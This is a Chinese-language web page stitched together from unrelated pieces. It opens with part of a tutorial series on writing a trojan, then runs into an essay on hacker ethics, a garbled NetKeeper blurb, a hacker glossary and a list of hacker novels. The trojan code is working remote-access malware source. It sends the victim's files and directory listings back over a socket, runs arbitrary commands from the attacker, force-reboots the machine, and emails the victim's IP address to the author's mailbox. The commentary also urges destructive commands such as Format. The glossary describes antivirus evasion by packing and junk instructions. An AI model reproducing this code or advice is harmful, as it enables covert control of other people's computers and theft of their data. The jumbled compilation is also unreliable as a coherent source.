filename=(AnsiString(dirname)+"\\"+ent-d_name).c_str();

file://加上“\”字符后将指针指向目录流

else

filename=(AnsiString(dirname)+ent-d_name).c_str();

file://如果是根目录，则不用加“\”

attrib=_rtl_chmod(filename, 0);

file://得到目标文件的访问属性

if (attrib FA_RDONLY)

file://“”字符是比较前后两个变量，如果相同返回1,否则返回0

fwrite(" R",sizeof(char),3,fp);

file://将目标文件属性设为只读

else

fwrite(" ",sizeof(char),3,fp);

file://失败则写入空格

if (attrib FA_HIDDEN)

fwrite("H",sizeof(char),1,fp);

file://将目标文件属性设为隐藏

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_SYSTEM)

fwrite("S",sizeof(char),1,fp);

file://将目标文件属性设为系统

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_ARCH)

fwrite("A",sizeof(char),1,fp);

file://将目标文件属性设为普通

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_DIREC)

fwrite(" DIR ",sizeof(char),9,fp);

file://将目标文件属性设为目录

else

fwrite(" ",sizeof(char),9,fp);

file://失败则写入空格

fwrite(ent-d_name,sizeof(char),strlen(ent-d_name),fp);

file://将目录名写入目标文件

fwrite(CR_LF,1,1,fp);

file://写入换行

}

fclose(fp);

file://关闭文件

closedir(dir);

file://关闭目录

FILE *fp1=NULL;

times_of_try=0;

while(fp1==NULL)

{

fp1=fopen(TempFile,"r");

file://打开Win369.bat准备读

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已经试了100次了，仍未成功

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://并跳到END处

}

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

file://定义的一个空数组

Read_Num=fread(temp_content,1,300,fp1);

file://从目标文件中读入前300个字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

file://Return_Text变量加上刚才的300个字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp1);

file://重复

};

Return_Text=Return_Text+temp_content;

file://Return_Text变量加上刚才的300个字符

fclose(fp1);

file://关闭目标文件

Socket-SendText(Return_Text);

file://返回Return_Text变量的内容

}

}

够长吧？！察看目录树这么费劲啊？！你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了，Client将使用“type”命令，（手指累不累啊？）：

{

else if(temp.SubString(0,4)=="type")

{

file://如果前4个字符是“type”

int Read_Num;

int number=temp.Length();

AnsiString File_Name=temp.SubString(6,number-4);

file://将目标文件流存入File_Name变量中

times_of_try=0;

while(fp==NULL)

{

fp=fopen(File_Name.c_str(),"r");

file://打开目标文件准备读

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已试了100次了

Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的错误信息

goto END;

file://跳到END

}

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

file://定义一个空数组

Read_Num=fread(temp_content,1,300,fp);

file://从目标文件中读入前300个字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

file://Return_Text的内容加上刚才的字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp);

file://重复

};

Return_Text=Return_Text+temp_content;

file://Return_Text的内容加上刚才的字符

fclose(fp);

file://关闭目标文件

Socket-SendText(Return_Text);

file://返回Return_Text的内容，即你查看文件的内容

}

}

咳咳！累死了！还是来点轻松的吧??操纵目标机的光驱（注意：mciSendString()函数的声明在mmsystem.h头文件中）：

{

else if(temp=="open")

{

file://如果收到的temp的内容是“open”

mciSendString("set cdaudio door open", NULL, 0, NULL);

file://就弹出光驱的托盘

}

else if(temp=="close")

{

file://如果收到的temp的内容是“close”

mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);

file://就收入光驱的托盘。当然你也可以搞个死循环，让他的光驱好好活动活动！^_^

}

}

接着就是交换目标机的鼠标左右键，代码如下：

{

else if(temp=="swap")

{

SwapMouseButton(1);

file://交换鼠标左右键，简单吧？

}

}

然后就是使目标机重新启动。但这里要区分WinNt和Win9x??NT非常注重系统每个进程的权利，一个普通的进程是不应具备有调用系统的权利的，因此我们要赋予本程序足够的权限：

{

else if(temp=="reboot")

{

file://如果收到的temp的内容是“temp”

DWORD dwVersion = GetVersion();

file://得到操作系统的版本号

if (dwVersion 0x80000000)

{

file://操作系统是WinNt，不是Win9x

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

file://定义变量

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, hToken);

file://OpenProcessToken()这个函数的作用是打开一个进程的访问令牌

file://GetCurrentProcess()函数的作用是得到本进程的句柄

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,tkp.Privileges[0].Luid);

file://LookupPrivilegeValue()的作用是修改进程的权限

tkp.PrivilegeCount = 1;

file://赋给本进程特权

tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken, FALSE, tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

file://AdjustTokenPrivileges()的作用是通知Windows NT修改本进程的权利

ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);

file://强行退出WinNt并重启

}

else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);

file://强行退出Win9x并重启

}

}

如果以上都不是，就让它在Dos窗口中执行传来的命令：

{

else

{

file://如果都不是

char * CR_TF="\n";

times_of_try=0;

while(fp==NULL)

{

fp=fopen(TempFile,"w+");

file://创建Win369.bat，如果已存在就覆盖

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的信息

goto END;

file://跳到END

}

}

fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);

file://写入欲执行的命令

fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);

file://写入换行符

fclose(fp);

file://关闭Win369.bat

system(TempFile);

file://执行Win369.bat

Socket-SendText("Success");

file://返回“Success”信息

}

}

你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况（判断是否是一个企业的局域网），然后可以进一步攻击，比如Deltree和Format命令。^_^

到此，服务器程序的功能已全部完成，但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友，别走开！（未完待续）

木马是如何编写的（三）

武汉 周侃

上次已编写完服务器端的各种功能，但还差容错部分还未完成,下面我们Go on! 其代码如下（照敲不误 ^_^）：

{

END:;

Socket-Close();

file://关闭服务

ServerSocket1-Active =true;

file://再次打开服务

if (NMSMTP1-Connected) NMSMTP1-Disconnect();

file://如果SMTP服务器已连接则断开

NMSMTP1-Host = "smtp.163.net";

file://选一个好用的SMTP服务器，如163、263、sina和btamail

NMSMTP1-UserID = "";

file://你SMTP的ID

try

{

NMSMTP1-Connect();

file://再次连接

}

catch(...)

{

goto NextTime;

file://跳到NextTime

}

NMSMTP1-PostMessage-FromAddress ="I don't know!";

file://受害者的Email地址

NMSMTP1-PostMessage-FromName = "Casualty";

file://受害者的名字

NMSMTP1-PostMessage-ToAddress-Text = "crossbow@8848.net";

file://将信发到我的邮箱，这一步很关键

NMSMTP1-PostMessage-Body-Text = AnsiString("Server Running on:") + NMSMTP1-LocalIP ;

file://信的内容提示你“服务器正在运行”，并且告诉你受害者的目前的IP地址，以便连接

NMSMTP1-PostMessage-Subject = "Server Runn

中国年龄最小黑客，8岁写代码，1元买2500元东西，现在怎样？

他过得很好，依然是个天才，现在正在向着他的人生目标努力，得到了很多人的支持。

什么是黑客？

1-1：什么是“黑客”（hacker）

事实上，黑客也就是英文hacker的音译，hacker这个单词源于动词hack，这个词在英语中有“乱砍、劈，砍”之意，还有一个意思是指“受雇于从事艰苦乏味的工作的文人”。hack的一个引申的意思是指“干了一件非常漂亮的事”.在早期的麻省理工学院里，“hacker”有“恶作剧”的意思，尤指那些手法巧妙、技术高明的恶作剧，可见，至少是在早期，黑客这个称谓并无贬义。

“破解不是学习使用一个什么软件，不是按照说明书来操作，它是一种人和人智力的较量，是一种智慧的战争艺术，是一种知识与知识的较量。从本质上讲，学习破解跟学习其他知识一样，都是要下苦功，要靠灵感，要靠自己思考的。”这就是黑客对自己的行为的一种诠释。

1-2：什么是“骇客”（cracker）

骇客是“cracker”的音译，就是“破坏者”的意思。这些人做的事情更多的是破解商业软件、恶意入侵别人的网站并造成损失。

骇客具有与黑客同样的本领，只不过在行事上有些差别而已，这也是人们常常很难分清黑客与骇客的原因之一。

其实，黑客也好、骇客也好，名称只是一种代号而已，应该说他们之间并无绝对的界限，黑客和骇客都是非法入侵者，既然是非法入侵，再去区分什么善意和恶意也没有什么意义，这里要提醒大家的是：无论是善意还是恶意的入侵，都有可能给被入侵者造成一定的损失。

1-3：怎样才算是一名黑客

首先，黑客绝非是自称的，自称为黑客，甚至取了一个与黑客相关的名字，都会遭到真正的黑客的嘲笑。再黑客的圈子里，只有其他的黑客接纳了你，得到其他黑客的认可，你才能算个黑客。

其次，你应该具有一定的创造力，一个仅仅拿着黑客前辈们所编写的黑客软件到处乱试，一旦出现问题却又束手无策的人，绝对称不上是黑客。

此外，一名黑客还应当具又黑客的精神以及黑客的行为，要能够融入黑客们自然形成的黑客文化当中去。当然，最重要的就是：你必须具备黑客所应当有的技能，必须是技术上的行家。并且热衷于解决问题，能无偿地帮助别人。

1-4：黑客行为：

1：（不随便攻击个人用户及站点），作为一个黑客，在找到系统漏洞并侵入的时候，往往都会很小心地避免造成琐事，并且善意地提醒系统管理员，但是在这过程中会有许多因素都是未知的，没有人能肯定最终会是什么结果，因此一个好的黑客是不会随便攻击个人用户及站点的。

2：（多编写一些有用的软件），这些软件都是免费的，但又和一般的共享软件有所不同，因为这些软件的源代码同时也是公开的。

3：（帮助别的黑客测试与调试软件），没有人能写出完全没有一点错误或是不需要改进的完美软件，因而对软件的测试与调试是非常重要的，测试与调试软件甚至会比编写软件更耗费精力，但在黑客的世界中，这或许并算不了什么的，因为在你编写出一个软件后，会有许多其他的黑客热心地帮助你测试与调试。

4：（义务做一些力所能及的事情），黑客们都以探索漏洞与编写程序为乐，但在黑客的圈子里，除了探索漏洞与编写程序外，还有许多其他的杂事，如维护和管理相关的黑客论坛、新闻组以及邮件列表，维持大的软件供应站点，推动RFC和其他技术标准等等，这些事情都需要人来做，但也许并不都是那么令人感到有趣。所以，那些花费大量精力，义务地为网友们整理FAQ、写教程的黑客，以及各黑客站点的站长，在网络上都是令人尊敬的。

5：（洁身自好，不与“骇客”混在一起），真正的黑客总是耻于与“骇客”为伍，黑客不会随意破解商业软件并将其广泛流传，也不会恶意侵入别人的网站并造成损失，黑客的所作所为应当更象是对于网络安全的监督。

1-5：黑客精神

1：（“free”，自由、免费的精神），这是黑客文化的精髓之一，“free”是作为一个黑客所应该具有的态度。作为一个好的黑客，应该主动去发现问题并解决问题，同时还要创造新的东西，相信自由并自愿的互相帮助。黑客们编写的各种黑客软件都是完全免费共享的，甚至连源代码都是公开的，黑客们在帮助你之后，唯一的要求就是在你成长起来以后同样地帮助别人。所以，“free”可以算是黑客的传统精神，也是一个真正的黑客所尽力保持的。

2：（探索与创新的精神），所有的黑客都是喜欢探索软件程序奥秘的人，他们探索着程序与系统的漏洞，并能够从中学到很多知识，在发现问题的同时，他们都会提出解决问题的创新方法。

3：（反传统的精神），反传统的精神在黑客们的身上表现的最明显不过了，不具备这种精神的人，很难想象他会成为一名黑客。而这里的“反传统”主要是指科学技术上的反传统，并不包含任何贬义。黑客们做的最多的事情就是探索与创新，这都需要他们具有反传统的精神，他们的快乐就源于攻破传统的东西。

4：（合作的精神），个人的力量是有限的，黑客们很明白这一点，因此才有了那么多供黑客交流的论坛与新闻组，在技术上保留的人是不可能成为黑客的。

1-5：黑客所必须具备的基本技能：

1：（程序设计基础），毫无疑问，编程是每一个黑客所应该具备的最基本的技能。但是，黑客与程序员又是有所不同的，黑客往往掌握着许多种程序语言的精髓，或者说是弱点与漏洞。并且黑客们是以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题，汇编语言、C语言都是黑客们应该掌握的。培养这种能力的方法要与常人不同，要多读别人的源代码，好的源代码都是前辈黑客们的作品，同时也要自己试着写程序。

2：（了解并熟悉各种操作系统），Unix之所以如此受到黑客们的重视，并不仅仅因为它最初就是由黑客们编写的，我们知道除了Unix操作系统外还有很多操作系统，但能得到源代码并能任意修改的操作系统只有Unix！更重要的是，Unix是用于网络的操作系统，互连网上有许多主机使用的操作系统都是Unix，至少在目前，互连网还不能没有Unix。因此，许多黑客同时也是一个Unix专家，他们清楚这个操作系统的这个运做过程与基理。除了Unix操作系统外，黑客还必须熟知诸如Liux、Windows、Novell等操作系统，才能使自己做黑客如虎添翼！

3：（全面了解互连网以及网络编程），黑客们所创造出来的东西，在很多领域里都在起着作用，但只有互连网，才是黑客们真正的舞台，作为一名黑客，不懂得使用World Wide Web 与Html是不可思议的，同时，若没有网络编程基础，要做黑客也是苍白无力的。

netkeeper校园网连不上，显示错误代码118

第一种办法：把本地连接禁用就可以了。要上网的时候再双击启用就可以了。第二种办法：本地连接设置IP地址，还有就是DNS。想要上网的时候就是全部自动获取就可以了。（这个比较隐蔽，不容易发现。）第三种办法：宽带连接时不要自动保存密码，想上网就输入宽带密码就行了。

NetKeeper 在侦测到网路攻击行为的同时，会立即启动强大的实时主动防御系统将非法的封包过滤阻挡或者中断其网路连线，同时启动警报系统、完整事件记录系统…等等有效作为。NetKeeper 结合了攻击特征内容比对与网路异常行为模块分析的方法，来侦测及分析对内或对外的网路封包内容。利用这两种混合的机制，NetKeeper不仅可以完全防治已知网路攻击，对于侦测未知型态的网路攻击，更可以经由简单的设定调整出弹性化的防御规则，而延伸网路防御功能，达到侦测新型态网路攻击的目的。

另外，NetKeeper 建置在拥有高效能网路平台和专属的即时操作系统之上，可以比其它软件式的网入侵侦测设备，做到更快速实时的韧体更新、软件更新、特征资料库更新等等，来防御

网路世界中层出不穷的网路黑客攻击。因此，在网路环境不再单纯、计算机黑客大肆横行下，NetKeeper所具备的超强功能，绝对能让企业的网路安全策略，透过中央控管，滴水不漏，做到真正的安全防护。

黑客基本术语

1，肉鸡：所谓“肉鸡”是一种很形象的比喻，比喻那些可以随意被我们控制的电脑，对方可以是WINDOWS系统，也可以是UNIX/LINUX系统，可以是普通的个人电脑，也可以是大型的服务器，我们可以象操作自己的电脑那样来操作它们，而不被对方所发觉。

2，木马：就是那些表面上伪装成了正常的程序，但是当这些被程序运行时，就会获取系统的整个控制权限。有很多黑客就是 热中与使用木马程序来控制别人的电脑，比如灰鸽子，黑洞，PcShare等等。

3，网页木马：表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中，当有人访问时，网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。

4，挂马：就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里，以使浏览者中马。

5，后门：这是一种形象的比喻，入侵者在利用某些方法成功的控制了目标主机后，可以在对方的系统中植入特定的程序，或者是修改某些设置。这些改动表面上是很难被察觉的，但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接，重新控制这台电脑，就好象是入侵者偷偷的配了一把主人房间的要是，可以随时进出而不被主人发现一样。

通常大多数的特洛伊木马（Trojan Horse）程序都可以被入侵者用语制作后门（BackDoor）

6，rootkit：rootkit是攻击者用来隐藏自己的行踪和保留root（根权限，可以理解成WINDOWS下的system或者管理员权限）访问权限的工具。通常，攻击者通过远程攻击的方式获得root访问权限，或者是先使用密码猜解（破解）的方式获得对系统的普通访问权限，进入系统后，再通过，对方系统内存在的安全漏洞获得系统的root权限。然后，攻击者就会在对方的系统中安装rootkit，以达到自己长久控制对方的目的，rootkit与我们前边提到的木马和后门很类似，但远比它们要隐蔽，黑客守卫者就是很典型的rootkit，还有国内的ntroorkit等都是不错的rootkit工具。

9，IPC$：是共享“命名管道”的资源，它是为了让进程间通信而开放的饿命名管道，可以通过验证用户名和密码获得相应的权限，在远程管理计算机和查看计算机的共享资源时使用。

10.弱口令：指那些强度不够，容易被猜解的，类似123，abc这样的口令（密码）

11.默认共享：默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬盘的共享，因为加了"$"符号，所以看不到共享的托手图表，也成为隐藏共享。

12.shell：指的是一种命令指行环境，比如我们按下键盘上的“开始键+R”时出现“运行”对话框，在里面输入“cmd”会出现一个用于执行命令的黑窗口，这个就是WINDOWS的Shell执行环境。通常我们使用远程溢出程序成功溢出远程电脑后得到的那个用于执行系统命令的环境就是对方的shell

13.webshell：webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做是一种网页后门。黑客在入侵了一个网站后，通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，好后就可以使用浏览器来访问这些asp 或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。可以上传下载文件，查看数据库，执行任意程序命令等。国内常用的webshell有海阳ASP木马，Phpspy，c99shell等

14.溢出：确切的讲，应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误，后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类：（1）堆溢出（2）栈溢出。

15.注入：随着B/S模式应用开发的发展，使用这种模式编写程序的程序员越来越来越多，但是由于程序员的水平参差不齐相当大一部分应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想要知的数据，这个就是所谓的SQLinjection，即：SQL注意入。

16.注入点：是是可以实行注入的地方，通常是一个访问数据库的连接。根据注入点数据库的运行帐号的权限的不同，你所得到的权限也不同。

17.内网：通俗的讲就是局域网，比如网吧，校园网，公司内部网等都属于此类。查看IP地址如果是在以下三个范围之内的话，就说明我们是处于内网之中的：10.0.0.0—10.255.255.255，172.16.0.0—172.31.255.255，192.168.0.0—192.168.255.255

18.外网：直接连入INTERNET（互连网），可以与互连网上的任意一台电脑互相访问，IP地址不是保留IP（内网）IP地址。

19.端口：（Port）相当于一种数据的传输通道。用于接受某些数据，然后传输给相应的服务，而电脑将这些数据处理后，再将相应的恢复通过开启的端口传给对方。一般每一个端口的开放的偶对应了相应的服务，要关闭这些端口只需要将对应的服务关闭就可以了。

20.3389、4899肉鸡：3389是WINDWS终端服务（Terminal Services）所默认使用的端口号，该服务是微软为了方便网络管理员远程管理及维护服务器而推出的，网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上，成功登陆后就会象操作自己的电脑一样来操作主机了。这和远程控制软件甚至是木马程序实现的功能很相似，终端服务的连接非常稳定，而且任何杀毒软件都不会查杀，所以也深受黑客喜爱。黑客在入侵了一台主机后，通常都会想办法先添加一个属于自己的后门帐号，然后再开启对方的终端服务，这样，自己就随时可以使用终端服务来控制对方了，这样的主机，通常就会被叫做3389肉鸡。Radmin是一款非常优秀的远程控制软件，4899就是Radmin默认使以也经常被黑客当作木马来使用（正是这个原因，目前的杀毒软件也对Radmin查杀了）。有的人在使用的服务端口号。因为Radmin的控制功能非常强大，传输速度也比大多数木马快，而且又不被杀毒软件所查杀，所用Radmin管理远程电脑时使用的是空口令或者是弱口令，黑客就可以使用一些软件扫描网络上存在Radmin空口令或者弱口令的主机，然后就可以登陆上去远程控制对恶劣，这样被控制的主机通常就被成做4899肉鸡。

21.免杀：就是通过加壳、加密、修改特征码、加花指令等等技术来修改程序，使其逃过杀毒软件的查杀。

22.加壳：就是利用特殊的酸法，将EXE可执行程序或者DLL动态连接库文件的编码进行改变（比如实现压缩、加密），以达到缩小文件体积或者加密程序编码，甚至是躲过杀毒软件查杀的目的。目前较常用的壳有UPX，ASPack、PePack、PECompact、UPack、免疫007、木马彩衣等等。

23.花指令：就是几句汇编指令，让汇编语句进行一些跳转，使得杀毒软件不能正常的判断病毒文件的构造。说通俗点就是”杀毒软件是从头到脚按顺序来查找病毒。如果我们把病毒的头和脚颠倒位置，杀毒软件就找不到病毒了“。

先写这么多吧，希望对哥们们有帮助了哈

“反弹端口”原理：

服务端（被控制端）主动连接客户端（控制端），为了隐蔽起见，监听端口一般开在80（提供HTTP服务的端口），这样，即使用户使用端口扫描软件检查自己的端口，也难以发现。而控制端发给服务端的数据是一个第三方的空间来实现的，一般用一个主页空间，控制端通过FTP写主页空间上的一个文件，而服务端定期?*** TTP协议读取这个文件的内容，当发现客户端让自己开始连接时，就主动连接。这样，控制端就可以穿过防火墙，甚至还能访问局域网内部的电脑。

软件加壳：

“壳”是一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行，拿到控制权，然后完成它们保护软件的任务。经过加壳的软件在跟踪时已看到其真实的十六进制代码，因此可以起到保护软件的目的。

软件脱壳：

顾名思义，就是利用相应的工具，把在软件“外面”起保护作用的“壳”程序去除，还文件本来面目，这样再修改文件内容就容易多了。

蠕虫病毒：

它利用了WINDOWS系统的开放性特点，特别是COM到COM+的组件编程思路，一个脚本程序能调用功能更大的组件来完成自己的功能。以VB脚本病毒为例，它们都是把VBS脚本文件加在附件中，使用*.HTM，VBS等欺骗性的文件名。蠕虫病毒的主要特性有：自我复制能力、很强的传播性、潜伏性、特定的触发性、很大的破坏性。

缓冲区溢出：

功击者向一个地址区输入这个区间存储不下的大量字符。在某些性况下，这些多余的字符可以作为“执行代码”来运行，因此足以使功击者不受安全措施限制地获得计算机的控制权。

CMD：

是一个所谓命令行控制台。有两条进入该程序的通道：第一、鼠标点击“开始—运行”，在出现的编辑框中键入“CMD”，然后点击“确定”；第二、在启动Windows2000的时候，按F8进入启动选择菜单，移动光条或键入数字至安全模式的命令行状态。出现的窗口是一个在win9x系统常见的那种MSDOS方式的界面。尽管微软把这个工具当做命令解释器一个新的实例，但使用方法去和原来的DOS没有区别。

嗅控器：

（Snifffer）就是能够捕获网络报文的设备。嗅控器的正当用处在于分析网络的流量，以便找出所关心的网络中潜在的问题。

密罐：（Honeypot）

是一个包含漏洞的系统，它摸拟一个或多个易受功击的主机，给黑客提供一个容易功击的目标。由于密罐没有其它任务需要完成，因此所有连接的尝试都应被视为是可疑的。密罐的另一个用途是拖延功击者对其真正目标的功击，让功击者在密罐上浪费时间。与此同时，最初的功击目标受到了保护，真正有价值的内容光焕发不将受侵犯。

路由器（Routers）：

是用来连接不同子网的中枢，它们工作于osi 7层模型的传输层和网络层。路由器的基本功能就是将网络信息包传输到它们的目的地。一些路由器还有访问控制列表（ACLs），允许将不想要的信息包过滤出去。许多路由器都可以将它们的日志信息注入到IDS系统中，提供有关被阻挡的访问网络企图的宝贵信息。

Unicode漏洞：

Unicode是一个16位的字符集，他可以移植到所有主要的计算机平台并且覆盖几乎整个世界。微软IIS4和5都存在利用扩展Unicode字符取代“/”“\”而能利用“../”目录便利的漏洞。未经授权的用户可能利用IUSR_machinename帐号的上下文空间访问任何已知的文件。该帐号在默认情况下属于Everyone和Users组的成员，因此任何与Web根目录在同一个逻辑驱动器上的能被这些用户组访问的文件都能被删除、修改或执行，如同一个用户成功的登陆所能完成的功能一样！

CGI漏洞：

CGI是Common Gateway Inerface（公用网关接口）的简称，并不特指一种语言。Web服务器的安全问题主要包括：1）Web服务器软件编制中的BUG；2）服务器配置的错误。可能导致CGI源代码泄漏，物理路径信息泄漏，系统敏感信息泄漏或远程执行任意命令。CGI语言漏洞分为以下几类：配置错误、边界条件错误、访问验证错误、来源验证错误、输入验证错误、策略错误、使用错误等等。CGI漏洞大多分为一下几种类型：暴露不该暴露的信息、执行不该执行的命令、溢出。

SSL漏洞：

SSL是Secure Socket Layer的缩写。是网上传输信用卡和帐户密码等信息时广泛采用的行业加密标准。SSL常见的安全漏洞有三种：1、攻击证书，由于IIS服务器提供“客户端证书映射”功能，用于将客户端提交证书中的名字映射到NT系统的用户帐号，再这种情况下我们能够获得该主机的系统管理员权限！如果黑客不能利用非法的证书突破服务器，还可尝试暴力攻击。2、窃取证书，黑客还可能窃取有效的证书及相关的思友密匙。3、安全盲点。没有网络检测系统再加上没有安全漏洞审查，使得最重要的服务器反而成为受到最少防护的服务器。

IPC$漏洞：

IPC$是共享“命名管道”的资源，它对于程序间的通讯十分重要。再远程管理计算机和查看计算机的共享资源时使用。利用IPC我们可以与目标主机建立一个空的连接，而利用这个空连接，我们还可以得到目标主机上的用户列表。但是，一些别有用心的人会利用IPC$，查找我们的用户列表，并使用一些字典工具，对我们的主机进行入侵攻击。

IIS漏洞：

IIS是Internet Information Service的缩写。是微软公司的Web服务器。IIS支持多种需要服务器端处理的文件类型，当一个WEB用户从客户端请求此类文件时，相应的DLL文件将自动对其进行处理。然而再ISM.DLL这个负责处理HTR文件的文件中被发现存在严重的安全漏洞。该漏洞包含了一个再ISM.DLL重未经验证的缓冲，他可能对WEB服务器的安全运作造成两方面的威胁。首先，是来自服务拒绝攻击的威胁，另一个威胁通过使用一个精心构建过的文件请求将可以利用标准缓存溢出手段导致2进制代码再服务器端运行，再这种情况下，什么都可能发生！

NTLM验证：

NTLM(NT LAN Mangager)是微软公司开发的一种身份验证机制，从NT4开始就以之使用，主要用于本地的帐号管理。

IPC管道：

为了更好的控制和处理不同进程之间的通信和数据交换，系统会通过一个特殊的连接管道来调度整个进程。

3389漏洞：

由于微软的原因，使得安装了微软服务终端和全拼的Win2K服务器存在着远程登陆并能获得超级用户全县的严重漏洞。

139漏洞：

通过139端口入侵是网络攻击中常见的一种攻击手段，一般情况下139端口开启是由于NetBIOS网络协议的使用。NetBIOS就是网络基本输入输出系统，系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应的IP地址，从而实现信息通讯。再局域网内部使用NetBIOS协议可以非常方便的实现消息通信，但是如果再Internet上，NetBIOS就相当于一个后门程序，很多攻击这都是通过NetBIOS漏洞发起攻击的！

shell：

shell是系统与用户的交换方式界面。简单来说，就是系统与用户“沟通”的环境。我们平时常用到的DOS，就是一个shell。（Windows2000是cmd.exe）

root：

Unix里面最高权限的用户～即超级管理员

admin：

Windows NT里面最高权限的用户～

rootshell：

通过溢出程序，再主机溢出一个具有root权限的shell。（顺便说一句，国内一知名黑客也叫这个名字）

IDS：

入侵检测系统，用于在黑客发起进攻或是发起进攻之前检测到攻击，并加以拦截。IDS是不同于防火墙的，防火墙只能屏蔽入侵，而IDS却可以在入侵发生以前，通过一些信息来检测到即将发生的攻击或是入侵以作出反应。

UDP：

一种传输层协议，在网络上不可靠的传输数据包，被DNS用于查询和应答，许多流音频和视频应用也使用它。

API：

一套定义的一致性方法，软件开发人员能用他来编写与其他程序捷克欧的程序。API用于扩展程序的功能和使用预编写的组创建新的程序。

FTP：

文件传输协议。一类应用以及该应用使用的协议的名字，用于将文件从一台计算机移动到另一台。

HTTP：

超文本传输协议。用于在万维网上传输数据，包括超文本标识语言文档、图像、可执行内容等等。TCP承载HTTP，一般服务器监听端口80。

HTTPS：

安全超文本传输协议。通过在安全套接字层（SSL）协议上运行超文本传输协议来将安全添加到万维网中。HTTPS能用于将WEB服务器认证到客户，将客户认证到WEB服务器和加密在两个系统之间传输的所有数据，HTTPS服务器一般监听TCP端口443。

IRC：

Internet中继交谈，一系列程序和一种协议，用于实现在Internet上的交谈会话。IRC特别受计算机地下组织的欢迎，北移些攻击者用来讨论他们的工具、技术和战利品。

MAC Address：

网络接口的数据链路层（第二层）地址。对于以太网卡，MAC地址维48bit长。

LAN：

局域网！一种网络，连接近距离的计算机，一般位于单个房间、建筑物或小的地理区域里。LAN上的所有系统位于一个网络跳之间。

ping：

一类基于Internet控制消息协议的数据包，用于判断网络上的某台计算机是否可以到达。

Proxy：

代理。一类程序或系统，接收来自客户机算计的流量，并代表客户与服务器交互。代理能用于过滤应用级别的制定类型的流量或缓存信息以提高性能。许多防火墙依赖代理进行过滤。

telnet：

用于系统的远程命令行访问的程序和协议。telnet在TCP上传输，服务器一般在TCP端口23监听。

TCP：

传输控制协议。一种传输层协议，被许多要求数据的可靠传输的应用所使用。HTTP、SMTP、FTP和telnet都使用TCP进行传输。

TCP/IP:

整个网际协议族的集合名，包括TCP、UDP、IP和ICMP。

求好的黑客小说...不要ctry+V的,,谢谢...

天擎听说撒冷写的不错,本人还没看

黑客江湖不知道为什么TJ了,但是貌似也忙好看的,可惜了.

原始动力和黑客江湖一样的作者,但看到后面有点看不下去了,都市的内容太多了吧- -

白手起家貌似不错,没看过

禁区之门又名地狱黑客,嗯,是根据一名黑客的经历所改编的,还行- -(我没看下去,改编有点玷污了本来黑客的形象)

指间的黑客褒贬不一啊,还在我的收藏夹里躺着呢,没来的及看

超级系统主角执行任务成植物人以后,脑子里有个电脑,然后输入代码控制身体.(个人认为有点假)

我黑了全世界这个小说呢,就名字而言,感觉不错,没完结,好像.

还有现在在看的重活之超级黑客你可以跳过都市部分,我就这样看的,听惊心动魄的,貌似还在更新.

黑客小说完结的比较少,好看的更少,导致我现在都没有看完的一部,先看的没完结,很郁闷的.

附加:

1.指间的黑客     

2.黑客传说        

3.原始动力        

4.禁区之门（地狱黑客）    

5.颠峰黑客         

6.心灵黑客         

7.黑客江湖         

8.网络骑士        

9.黑客的心       

10.黑客风云      

11.天擎              

12.数字生命       

13.白手起家      

14.黑客反击战

15.程序员法则   

16.红色黑客      

17.我用电脑黑了全世界     

18.网神－黑客启示录         

19.骇世黑客                       

20.我是一个黑客                

21.首席黑客                 

22.网络特级追杀令             

23.校园网络黑客之剑心传    

24.谁动了你的密码              

25..黑客之少年的成长          

26.超级黑客             

27.极品黑客             

28.黑客之王             

29.极光骇客             

30.黑客天堂             

31.我的黑客女友       

32.未来黑客             

33.黑客界的耻辱——剽窃之王      

34.疯狂的程序员       

35.再世黑客              

36.终极黑客              

37.超级系统 

